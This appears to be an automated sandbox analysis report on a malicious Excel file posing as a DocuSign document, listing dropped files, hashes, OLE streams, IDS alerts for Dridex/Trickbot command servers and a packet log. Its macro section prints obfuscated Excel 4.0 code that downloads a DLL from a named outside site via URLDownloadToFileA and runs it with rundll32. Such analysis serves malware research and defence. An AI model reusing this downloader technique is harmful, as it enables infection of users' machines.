• Filename: SecuriteInfo.com.Heur.11266.xls, Detection: malicious
• Filename: SecuriteInfo.com.Heur.18554.xls, Detection: malicious
• Filename: Sign-636.xls, Detection: malicious
• Filename: Sign-92793351_1597657581.xls, Detection: malicious
• Filename: Sign-979329054_1327186231.xls, Detection: malicious
• Filename: Sign-709986424_219667767.xls, Detection: malicious
• Filename: Sign-488964532_2104982999.xls, Detection: malicious
Reputation: moderate, very likely benign file
IE Cache URL: http://www.chipmania.it/mails/open.php
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........*.y.K.*.K.*.K.*.#.+.K.*.#.+~K.*.#.+.K.*.;.+.K.*.;.+.K.*.#.+.K.*.K.*.K.*.;.+.K.*N:.+.K.*N:.+.K.*N:.*.K.*N:.+.K.*Rich.K.*........................PE..L....s/`...........!.....rB..........}A.......B..............................`F...........@......................... .D.`.....D.<.....D.Xp...................@F.....`.D.p............................D.@.............B.X............................text....qB......rB................. ..`.rdata........B......vB.............@..@.data...8.....D.......D.............@....rsrc...Xp....D..r....D.............@..@.reloc.......@F.......E.............@..B........................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\0BCE0000
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 155530
Entropy (8bit): 7.660505379704475
Encrypted: false
SSDEEP: 3072:YxWVpupSzxNEBBD+Os7/xxkKCtRbsYO1entseoXXF:YEGSzx0dmxk7RbsYsKtseoX1
MD5: 3CFBC6707341EF2AF668B0B66554A0D8
SHA1: 2E47F97B737C1885E37322D4789B67BC79D0625F
SHA-256: BE269837B25164FC761785BE33AEB7A7ADAC5138AB3C081BA678F310A6674FEA
SHA-512: 1BE89DB6402BB1F07AA271C8E58AE75BB2AEAF20200EBCF118484AC8F7D5E9DF96D0C3B6A1AEE88F6197E85287D54645CE67D01B8835D8E737657521F0D6F954
Malicious: false
Reputation: low
Preview: ...n.0.E.......D'.....E....I?.&..k..a...;...5.K....{..H......"j.Zv..X.Nz.]..._..$...;h....,..?l.`E..[..>q...+......|.".m.x.r-:......K.R...[..J<.T.n....R;V}..Q-.!.-E"...#H.W+-Ay.hI...A(...5M.....R......#...tY8....Q..}%..,.`....r..*..^.}.wja...;..7a.^|c.......H....6.LSj.X!..ubi..v/..J$.r.....39...I...Q|O5r..w.T...|.c..O........0m...\..n':D.E.u..O....?..|.(........{...1...&.........1}.}@.."L.....]....4....u .t..<.\ .S...6/...........PK..........!..#|.....X.......[Content_Types].xml ...(...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Sat Feb 20 09:16:38 2021, atime=Sat Feb 20 09:16:38 2021, length=8192, window=hide
Category: dropped
Size (bytes): 867
Entropy (8bit): 4.471936882845852
Encrypted: false
SSDEEP: 12:85QfAVNcLgXg/XAlCPCHaXgzB8IB/8PHxX+WnicvbTfbDtZ3YilMMEpxRljKw6Tg:85bNK/XTwz6IGxYeHDDv3q+rNru/
MD5: 8095CD6291864E260C361BF1A10EA172
SHA1: 752607AC2889B2E58D3EB31D7947D618A2A37059
SHA-256: 1F3839B20BF958449313BD88CD52DB6CA36AFD3400648086ACF7BB7288B5BCCF
SHA-512: 4A8F9A3FCDEB7971FF3E2DFEF08F72611E5EF85FCC09D8EB8C8F142BD7DAD142FA28F46FA586CECCB02B7772C6DD3919BA03337800A54604CA773A56D69CA6B0
Malicious: false
Reputation: low
Preview: L..................F...........7G..._jyq...._jyq.... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....TR.R..Desktop.d......QK.XTR.R*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\377142\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......377142..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\SecuriteInfo.com.Exploit.Siggen3.10350.12632.LNK
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Feb 20 09:16:25 2021, mtime=Sat Feb 20 09:16:38 2021, atime=Sat Feb 20 09:16:38 2021, length=168448, window=hide
Category: dropped
Size (bytes): 2368
Entropy (8bit): 4.571681128279049
Encrypted: false
SSDEEP: 48:8W/XT3IHvjHCEsfHC4+Qh2W/XT3IHvjHCEsfHC4+Q/:8W/XLILiW4+Qh2W/XLILiW4+Q/
MD5: 219D84A5D4271A1B5652936B567E0447
SHA1: F7BFF2FDA0916098A953AA4ECE644FAD43285EC7
SHA-256: 2BA7892A29E9B37D1FB472361CC3276B8FFD38D38C54B974012B2D3301FD714C
SHA-512: E796B5EABBC8E454C63A8BBB9FC8DBE5BD42B7E5C698238B5BD77EA2538050A10CED8415D13E5EC7B94A9A539BE6B62A7DD14706A909EF611EF8F897D2BD7354
Malicious: false
Reputation: low
Preview: L..................F.... ......qq...._jyq.....qyq................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....TR.R..Desktop.d......QK.XTR.R*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....TR.R .SECURI~1.XLS.........TR.RTR.R*.........................S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...S.i.g.g.e.n.3...1.0.3.5.0...1.2.6.3.2...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\377142\Users.user\Desktop\SecuriteInfo.com.Exploit.Siggen3.10350.12632.xls.G.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...S.i.g.g.e.n.3...1.0.3.5.0...1.2.6.3.2...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 185
Entropy (8bit): 4.876408116811588
Encrypted: false
SSDEEP: 3:oyBVomM0bcsoMW4CuscbcsoMW4CmM0bcsoMW4Cv:dj60wsoMWOwsoMWR0wsoMWV
MD5: 0705594BE5F4187688CFE5334909ABDC
SHA1: 321F5868568FDED9259F861BA40960D027D6A794
SHA-256: BF282C362016DCFDBABDBE3DB34A3394434CE9EF8FFF9A7E0B3F6AAC1071BD6D
SHA-512: 4788B12278CAF8CE9C9782BE378B3464EDE8D0546D14DFC0965540C1E11EA692A468D7816FD0A72C10C11ABBAC473701E05E56CA4FCB4D8B7A61A21FA1F475B7
Malicious: false
Reputation: low
Preview: Desktop.LNK=0..[xls]..SecuriteInfo.com.Exploit.Siggen3.10350.12632.LNK=0..SecuriteInfo.com.Exploit.Siggen3.10350.12632.LNK=0..[xls]..SecuriteInfo.com.Exploit.Siggen3.10350.12632.LNK=0..
C:\Users\user\BASE.BABAA
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 4591104
Entropy (8bit): 5.0540147937501265
Encrypted: false
SSDEEP: 49152:7SkyvIo/YMOZswCkQzvhtawebv5hW2/yF//4VPQw:NCetO//S9
MD5: 25056DF6D3546DE971EAFE5DA5F9AE44
SHA1: 179555B3D0391E45DF29E651B8ED0342D02FE88A
SHA-256: AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB
SHA-512: 8032A5BD9B07ACCC290B24FD2AFA299AFD12214026089665836FADE7282F0D217FFD79F5A3A12FD64E0E08D4F6FA0A04A8B036B4CDC1F95356B0BF43D6A80B50
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 6%
Joe Sandbox View:
• Filename: SecuriteInfo.com.Exploit.Siggen3.10350.20211.xls, Detection: malicious
• Filename: SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls, Detection: malicious
• Filename: SecuriteInfo.com.Exploit.Siggen3.10350.24644.xls, Detection: malicious
• Filename: SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls, Detection: malicious
• Filename: SecuriteInfo.com.Exploit.Siggen3.10350.26515.xls, Detection: malicious
• Filename: SecuriteInfo.com.Exploit.Siggen3.10350.31033.xls, Detection: malicious
• Filename: SecuriteInfo.com.Heur.1476.xls, Detection: malicious
• Filename: SecuriteInfo.com.Heur.1181.xls, Detection: malicious
• Filename: SecuriteInfo.com.Heur.21235.xls, Detection: malicious
• Filename: SecuriteInfo.com.Heur.15875.xls, Detection: malicious
• Filename: SecuriteInfo.com.Heur.21759.xls, Detection: malicious
• Filename: SecuriteInfo.com.Heur.2804.xls, Detection: malicious
• Filename: SecuriteInfo.com.Heur.1138.xls, Detection: malicious
• Filename: SecuriteInfo.com.Heur.11266.xls, Detection: malicious
• Filename: SecuriteInfo.com.Heur.18554.xls, Detection: malicious
• Filename: Sign-636.xls, Detection: malicious
• Filename: Sign-92793351_1597657581.xls, Detection: malicious
• Filename: Sign-979329054_1327186231.xls, Detection: malicious
• Filename: Sign-709986424_219667767.xls, Detection: malicious
• Filename: Sign-488964532_2104982999.xls, Detection: malicious
Reputation: moderate, very likely benign file
                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........*.y.K.*.K.*.K.*.#.+.K.*.#.+~K.*.#.+.K.*.;.+.K.*.;.+.K.*.#.+.K.*.K.*.K.*.;.+.K.*N:.+.K.*N:.+.K.*N:.*.K.*N:.+.K.*Rich.K.*........................PE..L....s/`...........!.....rB..........}A.......B..............................`F...........@......................... .D.`.....D.<.....D.Xp...................@F.....`.D.p............................D.@.............B.X............................text....qB......rB................. ..`.rdata........B......vB.............@..@.data...8.....D.......D.............@....rsrc...Xp....D..r....D.............@..@.reloc.......@F.......E.............@..B........................................................................................................................................................................................................................................................................................
C:\Users\user\Desktop\3ECE0000
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: Applesoft BASIC program data, first line number 16
Category: dropped
Size (bytes): 177025
Entropy (8bit): 7.239939848374362
Encrypted: false
SSDEEP: 3072:zccKoSsxzNDZLDZjlbR868O8KL5L+4iK2xEtjPOtioVjDGUU1qfDlaGGx+cL2Qnr:4cKoSsxzNDZLDZjlbR868O8KL5L+4iKf
MD5: 8C6E6E3B60E506C0CCA7F66BBB581A1A
SHA1: 04F6ABD1996A42A02763B9F32DA952A7FDEDE7A0
SHA-256: CF2F697E24C0B014B1513632471C307F9DCF141C34C44D5DF54297695457DD74
SHA-512: 1BA5A33D57C5D082422E6431B7F53B57C971F2B97EE7C95C3B1D902E7F2B4B0F9D380EEC7F0CD56FAB6083A98710A0FF3B0657217B75748C6CF776277212F7C1
Malicious: false
Reputation: low
                                                                                                                                            Preview: ........g2.........................\.p.... B.....a.........=.............................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.............

Static File Info

General

File type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Feb 19 10:48:36 2021, Security: 0
Entropy (8bit): 7.195176543915214
TrID:
• Microsoft Excel sheet (30009/1) 78.94%
• Generic OLE2 / Multistream Compound File (8008/1) 21.06%
File name: SecuriteInfo.com.Exploit.Siggen3.10350.12632.xls
File size: 168960
MD5: 422030b616989ef7bf2f56a2f266068f
SHA1: 04ec47e9f08ed7e4861c6f252a381faee4283bf9
SHA256: 6f1c23f3d7e471cf0c4a91f59c94853128413b84065ef42ad2065337b973beab
SHA512: bd90c0d5f31bc58456d179d753cfb1838a23312f2b0ea2aa01c9ed6223d9c72ee25929f60b6a85a65e800997b9fe745392379b4eb96a51bf94b2f903b41b2ec1
SSDEEP: 3072:bScKoSsxzNDZLDZjlbR868O8KlVH3jiKq7uDphYHceXVhca+fMHLtyeGxcl8OUMn:OcKoSsxzNDZLDZjlbR868O8KlVH3jiKi
                                                                                                                                            File Content Preview:........................>.......................H...........................E...F...G..........................................................................................................................................................................

File Icon

Icon Hash: e4eea286a4b4bcb4

Static OLE Info

General

Document Type: OLE
Number of OLE Files: 1

OLE File "SecuriteInfo.com.Exploit.Siggen3.10350.12632.xls"

Indicators

Has Summary Info: True
Application Name: Microsoft Excel
Encrypted Document: False
Contains Word Document Stream: False
Contains Workbook/Book Stream: True
Contains PowerPoint Document Stream: False
Contains Visio Document Stream: False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros: True

Summary

Code Page: 1251
Author:
Last Saved By:
Create Time: 2006-09-16 00:00:00
Last Saved Time: 2021-02-19 10:48:36
Creating Application: Microsoft Excel
Security: 0

Document Summary

Document Code Page: 1251
Thumbnail Scaling Desired: False
Contains Dirty Links: False
Shared Document: False
Changed Hyperlinks: False
Application Version: 917504

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
General
Stream Path: \x5DocumentSummaryInformation
File Type: data
Stream Size: 4096
Entropy: 0.357299206868
Base64 Encoded: False
                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 ec 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 ac 00 00 00 02 00 00 00 e3 04 00 00
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
General
Stream Path: \x5SummaryInformation
File Type: data
Stream Size: 4096
Entropy: 0.247217286775
Base64 Encoded: False
                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 157800
General
Stream Path: Workbook
File Type: Applesoft BASIC program data, first line number 16
Stream Size: 157800
Entropy: 7.46869820242
Base64 Encoded: True
                                                                                                                                            Data ASCII:. . . . . . . . f 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . .
                                                                                                                                            Data Raw:09 08 10 00 00 06 05 00 66 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Macro 4.0 Code

                                                                                                                                            ,,,,,,,,,"=RIGHT(""353454543rtertetr,DllRegister"",12)&V19",,,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""KJHDFHURNVUTRSHYSTNLUURTHNBDZZLRDNYZru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&T19,40))",,,,,,,,=HALT(),,,
                                                                                                                                            "=FORMULA.FILL(A144,DocuSign!V19)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""YJDYJGYDJNUDTUXTNXYXNuRlMon"",6)",,,,,,,,,,,,,,,,,,,"=RIGHT(""JDHNLTVJRBNZXKHTFHNMXTFUXTownloadToFileA"",14)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=REGISTER(D134,""URLD""&D135,""JJCC""&A146,""YUTVUBSRNYTMYM"",,1,9)",,,,,,,,,,,,,,,,,,,http://"=YUTVUBSRNYTMYM(0,T137&D144&E144&E145&E146&E147,D141,0,0)",,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""hLKUYFBGVESLTNZBRHYMHYRZndll32"",6)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""XCVBDSTYFGYSDUZGKLRDHZTDJ..\BASE.BABAA"",13)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=GOTO(DocuSign!T3),,,,,,,,,,,,,,,,,,,Server,,,www.chipmania.it/mails/open,.,,,,,,,,,,,,,,,,,,,p,,,,,,,,,,,,,,,BB,,,,h,,,,,,,,,,,,,,,,,,,p,,,,,,,,,,,,,,,

Network Behavior

Snort IDS Alerts

Timestamp                 Protocol  SID      Message                                                                                  Source Port  Dest Port  Source IP      Dest IP
02/20/21-02:16:54.765622  TCP       2404324  ET CNC Feodo Tracker Reported CnC Server TCP group 13                                    49166        443        192.168.2.22   200.52.147.93
02/20/21-02:18:53.303160  TCP       2404306  ET CNC Feodo Tracker Reported CnC Server TCP group 4                                     49167        443        192.168.2.22   142.202.191.164
02/20/21-02:18:55.128222  TCP       2404320  ET CNC Feodo Tracker Reported CnC Server TCP group 11                                    49169        443        192.168.2.22   193.8.194.96
02/20/21-02:18:55.532096  TCP       2021013  ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)  443          49169      193.8.194.96   192.168.2.22

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 20, 2021 02:16:43.694610119 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 02:16:43.752089024 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.752243042 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 02:16:43.753083944 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 02:16:43.813005924 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.822292089 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.822345972 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.822381973 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.822411060 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.822443008 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.822474003 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.822495937 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 02:16:43.822505951 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.822525024 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 02:16:43.822530031 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 02:16:43.822535038 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 02:16:43.822539091 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.822539091 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 02:16:43.822565079 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 02:16:43.822571993 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.822609901 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.822611094 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 02:16:43.822644949 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 02:16:43.822664022 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 02:16:43.827573061 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 02:16:43.882463932 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.882489920 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.882503033 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.882517099 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.882530928 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.882544041 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.882561922 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.882590055 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.882601976 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.882616043 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.882627964 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.882638931 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.882646084 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 02:16:43.882649899 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.882668018 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.882685900 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.882702112 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.882700920 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 02:16:43.882749081 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 02:16:43.882765055 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.882783890 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.882792950 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 02:16:43.882796049 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.882810116 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.882862091 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 02:16:43.882894993 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 02:16:43.884835005 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 02:16:43.942574024 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.942631960 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.942673922 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.942691088 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 02:16:43.942713976 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.942715883 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 02:16:43.942722082 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 02:16:43.942764044 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.942773104 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 02:16:43.942809105 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.942821980 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 02:16:43.942850113 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.942864895 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 02:16:43.942889929 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.942919970 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 02:16:43.942949057 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.942981005 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 02:16:43.942987919 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.943025112 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 02:16:43.943028927 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.943069935 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.943080902 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 02:16:43.943084955 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 02:16:43.943119049 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.943119049 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 02:16:43.943162918 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.943192005 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 02:16:43.943202019 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.943212986 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 02:16:43.943242073 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
Feb 20, 2021 02:16:43.943259001 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78
Feb 20, 2021 02:16:43.943284035 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22
